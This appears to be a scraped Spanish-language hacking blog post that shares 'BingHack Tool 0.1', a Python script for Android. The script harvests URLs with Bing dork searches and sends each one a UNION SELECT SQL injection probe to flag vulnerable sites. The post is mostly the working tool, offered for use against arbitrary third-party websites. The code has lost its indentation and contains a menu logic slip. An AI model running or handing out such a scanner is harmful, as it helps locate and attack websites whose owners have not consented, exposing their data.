Un simple script en Python para Android con el fin de buscar paginas vulnerables a SQLI usando Bing.
Unas imagenes en mi gloriosa tablet argos.
Image may be NSFW.
Clik here to view.
Image may be NSFW.
Clik here to view.
Image may be NSFW.
Clik here to view.
Image may be NSFW.
Clik here to view.
El codigo :
Eso es todo.
Unas imagenes en mi gloriosa tablet argos.
Image may be NSFW.
Clik here to view.
Image may be NSFW.
Clik here to view.
Image may be NSFW.
Clik here to view.
Image may be NSFW.
Clik here to view.
El codigo :
Código:
#!usr/bin/python
#BingHack Tool 0.1
#Android Version
#(C) Doddy Hackman 2013
import android,urllib2,re
nave = urllib2.build_opener()
nave.add_header = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]
def toma(web) :
nave = urllib2.Request(web)
nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
op = urllib2.build_opener()
return op.open(nave).read()
def sql(webs):
respuesta = ""
for web in webs :
if re.findall("=",web):
web = re.split("=",web)
web = web[0]+"="
try:
code = toma(web+"-1+union+select+1--")
if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
respuesta = respuesta + "[SQLI] : "+web+"\n"
except:
pass
return respuesta
def limpiar(pag):
limpia = []
for p in pag:
if p not in limpia:
limpia.append(p)
return limpia
def buscar(dork,count):
respuesta = ""
pag = []
s = 10
while s <= int(count):
try:
code = toma("http://www.bing.com/search?q="+str(dork)+"&first="+str(s))
d = re.findall("<h3><a href=\"(.*?)\"",code,re.I)
s += 10
for a in d:
pag.append(a)
except:
pass
pag = limpiar(pag)
return pag
aplicacion = android.Android()
def menu():
aplicacion.dialogCreateAlert("BingHack Tool 0.1")
aplicacion.dialogSetItems(["Search","About","Exit"])
aplicacion.dialogShow()
re = aplicacion.dialogGetResponse().result
re2 = re["item"]
if re2==0:
red = aplicacion.dialogGetInput("BingHack Tool 0.1","Write the dork")
dork = str(red[1])
red = aplicacion.dialogGetInput("BingHack Tool 0.1","Write the number of pages to search")
paginas = str(red[1])
aplicacion.dialogCreateSpinnerProgress("BingHack Tool 0.1","Searching ...")
aplicacion.dialogShow()
founds = ""
rez = ""
rtafinal = ""
founds = buscar(dork,paginas)
aplicacion.dialogDismiss()
aplicacion.dialogCreateSpinnerProgress("BingHack Tool 0.1","Scanning ...")
aplicacion.dialogShow()
rez = sql(founds)
if len(rez) == 0 :
rtafinal = "[-] Not Found"
else :
rtafinal = "[++] Pages Founds\n\n"
rtafinal = rtafinal + rez
rtafinal = rtafinal + "\n[++] Finished\n"
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("BingHack Tool 0.1",rtafinal)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menu()
if re2==1 :
aplicacion.dialogCreateAlert("BingHack Tool 0.1","(C) Doddy Hackman 2013")
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
re3 = aplicacion.dialogGetResponse().result
if re3["which"] == "positive" :
menu()
if re3==2:
aplicacion.exit()
menu()
# The End ?